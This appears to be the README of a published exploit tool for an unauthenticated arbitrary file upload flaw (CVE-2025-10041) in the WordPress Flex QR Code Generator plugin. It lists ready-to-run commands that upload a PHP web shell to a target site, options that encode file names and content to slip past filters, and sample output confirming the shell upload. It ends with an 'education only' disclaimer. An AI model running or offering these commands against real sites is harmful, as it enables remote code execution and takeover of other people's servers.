Flex QR Code Generator <= 1.2.5 - 未认证的任意文件上传
WordPress 的 Flex QR Code Generator 插件在 save_qr_code_to_db() 函数中缺少文件类型验证,因此容易受到任意文件上传攻击,影响所有版本(包括 1.2.5 及更早版本)。
这允许未认证的攻击者将恶意文件上传到受影响站点的服务器,从而可能导致远程代码执行。
CVE-2025-100419.8 (严重)CVE-2025-10041.py 是一款专业的漏洞利用工具,旨在利用此漏洞自动化攻击过程。
它提供了用于绕过常见防护和编码技术的高级功能。
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
查看所有可用选项和使用说明:
python3 CVE-2025-10041.py --help
.php 或可疑文件名;编码可能绕过过滤器。eval(base64_decode(...)) 中可能绕过内容过滤器。Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
此脚本仅用于教育、研究和经授权的渗透测试目的。
对您不拥有或未经明确许可测试的系统进行未经授权的使用是严格禁止且违法的。
作者不对任何滥用或由此工具造成的损害负责。
Nxploited (Khaled Alenazi)